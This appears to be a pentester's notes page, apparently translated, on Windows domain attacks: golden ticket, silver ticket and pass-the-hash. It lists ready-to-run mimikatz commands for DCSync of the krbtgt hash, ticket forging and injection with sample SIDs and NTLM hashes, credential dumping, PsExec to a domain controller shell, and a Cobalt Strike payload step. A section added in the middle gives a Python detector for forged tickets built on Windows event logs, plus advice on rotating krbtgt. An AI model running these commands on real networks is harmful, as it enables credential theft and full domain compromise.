Golden Ticket
When the attacker has obtained administrative authority over the domain controller, the krbtgt account's hash can be used to forge a TGT (the golden ticket).
Running klist on a domain member host shows the cached tickets; klist purge clears them.
This is useful during the domain penetration process: if the domain administrator's password has been changed, try the krbtgt account's previous (history) hash for the ticket-passing attack. In practice, almost nobody changes the krbtgt account's password.
Information collection
Domain name: net time /domain, ipconfig /all
Administrator username to forge: net group "domain admins"
Hash of the krbtgt account: mimikatz.exe "lsadump::dcsync /domain:NoOne.com /user:krbtgt" exit
Domain SID (drop the trailing -500): wmic useraccount get name,sid
# Dump the NTLM hash of krbtgt
mimikatz.exe "lsadump::dcsync /domain:NoOne.com /user:krbtgt" exit
Use
# Forge the golden ticket
mimikatz.exe "kerberos::golden /admin:Administrator /domain:NOONE.com /sid:S-1-5-21-2867916317-3317112163-957300651 /krbtgt:f965f8d06c2f73dd5d7015d0c2d10fa6 /ticket:Administrator.kirbi" exit
# Pass the ticket to obtain domain administrator privileges
mimikatz.exe "kerberos::ptt Administrator.kirbi" exit
Silver Ticket
A forged TGS (service ticket); it only grants access to the specified service on the specified server.
Information collection
Domain name: net time /domain, ipconfig /all
Domain SID (drop the trailing -500): wmic useraccount get name,sid
Target machine FQDN: net time /domain (hostname + domain name), e.g. /target:\\WIN-75NA0949GFB.NOONE.com
Service to abuse, e.g. CIFS (file sharing): /service:CIFS
Username to forge: /user:Administrator
NTLM hash of the service account (Primary Username: WIN-75NA0949GFB$, the computer account with the $, not the admin's hash): /rc4:08d93ddf15a6309a46daaa7ec8565296
# Writes a mimikatz.log file (run on the domain controller)
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
Parameters of kerberos::golden when used for a silver ticket:
/user: the target account or computer to impersonate (the username to forge)
/domain: the domain name
/sid: the domain SID (whoami /user)
/target: the FQDN of the machine in the domain, e.g. /target:WIN-75NA0949GFB.NOONE.com
/service: the service to forge, e.g. /service:cifs
/rc4: the NTLM hash of the service account (user password or computer account password)
/ptt: optional; injects the ticket directly (or inject it with Rubeus)
Use
# Writes a mimikatz.log file (run on the domain controller)
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
# Forge the silver ticket, granting access to the CIFS service
mimikatz.exe "kerberos::golden /domain:NOONE.com /sid:S-1-5-21-2867916317-3317112163-957300651 /target:WIN-75NA0949GFB.NOONE.com /service:CIFS /rc4:08d93ddf15a6309a46daaa7ec8565296 /user:Administrator /ptt" exit
dir \\WIN-75NA0949GFB.NOONE.com\c$
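Both ticket types above leave gaps in the Windows Security log that a defender can look for: a golden ticket is a TGT the KDC never issued, so the DC sees service-ticket requests (event 4769, by default RC4-encrypted, TicketEncryptionType 0x17) with no preceding TGT request (event 4768) from that client; a silver ticket is presented straight to the host, so the host logs a Kerberos network logon (event 4624) that no 4769 on the DC accounts for. The following script is an added example, not part of the original page: it runs those heuristics over constructed sample events. The DC hostname DC01, the accounts alice and fakeadmin, their RIDs, the client IPs and the event field names used as attributes are assumptions; the domain SID and the target hostname are the ones shown on the page.

```python
"""Added example (not from the original page): heuristic detection of forged
Kerberos tickets (golden / silver) from Windows Security event records.
All events below are constructed sample data; the SID reuses the domain SID
shown on the page."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

RC4_HMAC = 0x17                      # TicketEncryptionType value for RC4-HMAC
TICKET_WINDOW = timedelta(hours=10)  # default TGT lifetime; how far back to correlate
DOMAIN_SID = "S-1-5-21-2867916317-3317112163-957300651"  # from the page

# Assumed directory snapshot (account name -> SID), pulled from AD beforehand.
DIRECTORY = {
    "administrator": DOMAIN_SID + "-500",
    "alice": DOMAIN_SID + "-1104",
}


@dataclass
class SecEvent:
    when: datetime
    event_id: int                # 4768 TGT request, 4769 service ticket request, 4624 logon
    host: str                    # logging host: the DC for 4768/4769, the target for 4624
    user: str                    # TargetUserName
    sid: str = ""                # TargetUserSid (4624)
    service: str = ""            # ServiceName (4769); for host services the computer account "HOST$"
    etype: Optional[int] = None  # TicketEncryptionType (4768/4769)
    client: str = ""             # IpAddress of the requesting client
    package: str = ""            # AuthenticationPackageName (4624)
    logon_type: int = 0          # LogonType (4624); 3 = network


def _within(later: SecEvent, earlier: SecEvent) -> bool:
    return timedelta(0) <= later.when - earlier.when <= TICKET_WINDOW


def detect_forged_tickets(events: List[SecEvent], directory: dict) -> List[Tuple[str, SecEvent]]:
    """Return (indicator, event) pairs for the golden/silver ticket heuristics."""
    findings: List[Tuple[str, SecEvent]] = []
    tgt_requests = [e for e in events if e.event_id == 4768]
    tgs_requests = [e for e in events if e.event_id == 4769]

    for e in tgs_requests:
        # RC4 service tickets stand out once the domain runs AES-only Kerberos.
        if e.etype == RC4_HMAC:
            findings.append(("rc4_service_ticket", e))
        # A service ticket request with no prior TGT request from the same client
        # means the TGT presented to the KDC was never issued by the KDC.
        if not any(t.user.lower() == e.user.lower() and t.client == e.client and _within(e, t)
                   for t in tgt_requests):
            findings.append(("tgs_without_tgt", e))

    for e in events:
        if e.event_id != 4624 or e.package.lower() != "kerberos" or e.logon_type != 3:
            continue
        # Forged tickets carry whatever name and RID the forger chose; check them against AD.
        if directory.get(e.user.lower()) != e.sid:
            findings.append(("name_sid_mismatch", e))
        # The KDC should have logged a 4769 for this user against this host's computer account.
        computer_account = e.host.split(".")[0].upper() + "$"
        if not any(t.user.lower() == e.user.lower() and t.service.upper() == computer_account
                   and _within(e, t) for t in tgs_requests):
            findings.append(("logon_without_tgs", e))
    return findings


t0 = datetime(2024, 1, 1, 9, 0)
DC = "DC01.NOONE.com"                  # assumed DC hostname
TARGET = "WIN-75NA0949GFB.NOONE.com"   # target host named on the page
SAMPLE_EVENTS = [
    # legitimate: TGT, then service ticket, then logon on the target
    SecEvent(t0, 4768, DC, "alice", etype=0x12, client="10.0.0.5"),
    SecEvent(t0 + timedelta(minutes=1), 4769, DC, "alice", service="WIN-75NA0949GFB$", etype=0x12, client="10.0.0.5"),
    SecEvent(t0 + timedelta(minutes=2), 4624, TARGET, "alice", sid=DOMAIN_SID + "-1104", client="10.0.0.5", package="Kerberos", logon_type=3),
    # golden ticket forged for a non-existent user with RID 500: 4769 without 4768, RC4, bad name/SID pair
    SecEvent(t0 + timedelta(minutes=5), 4769, DC, "fakeadmin", service="WIN-75NA0949GFB$", etype=RC4_HMAC, client="10.0.0.9"),
    SecEvent(t0 + timedelta(minutes=6), 4624, TARGET, "fakeadmin", sid=DOMAIN_SID + "-500", client="10.0.0.9", package="Kerberos", logon_type=3),
    # silver ticket: Kerberos logon on a file server that the DC never issued a service ticket for
    SecEvent(t0 + timedelta(minutes=10), 4624, "FILE01.NOONE.com", "Administrator", sid=DOMAIN_SID + "-500", client="10.0.0.9", package="Kerberos", logon_type=3),
]


def indicators(events: List[SecEvent] = SAMPLE_EVENTS) -> List[str]:
    return [name for name, _ in detect_forged_tickets(events, DIRECTORY)]


if __name__ == "__main__":
    for name, ev in detect_forged_tickets(SAMPLE_EVENTS, DIRECTORY):
        print(f"{ev.when:%H:%M} {name:<26} host={ev.host} user={ev.user}")
```

The RC4 check is only meaningful where the domain has AES enabled for Kerberos, and the "no 4768" check needs logs covering the full TGT lifetime from every DC, otherwise renewals and tickets issued before the log window will be flagged. The mitigation for the point the page makes about krbtgt is to rotate the krbtgt password twice (the KDC still honours tickets signed with the previous key), which invalidates any golden ticket built from the old hash.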
pass the hash
Once local administrator privileges are obtained: if the domain controller's password is the same as the web server's local administrator password, pass-the-hash can be used.
# Elevate privileges and dump the hashes
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> log.txt
# Pass the hash
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:NoOne.com /ntlm:c217b77d43348c0fa3c1f83f29747d5a"
# List the C: drive of the domain controller
dir \\WIN-75NA0949GFB.NOONE.com\c$
Just looking at the domain controller's C: drive is boring; let's do something more interesting.
On the compromised domain member host, upload PsExec.exe and change into its directory (https://github.com/vijayphilip/PsExecRemoteWinEC2)
psexec.exe \\WIN-75NA0949GFB.NOONE.com cmd.exe then gives a shell on the domain controller
Then generate a PowerShell payload with Cobalt Strike (CS) to bring the domain controller host online.
Note: ERROR kuhl_m_kerberos_ptt_data; LsaCallAuthenticationPackage KerbSubmitTicketMessage: c000000d
After a series of experiments of my own: if the domain member host is Windows XP or Windows Server 2003, the ticket cannot be forged normally.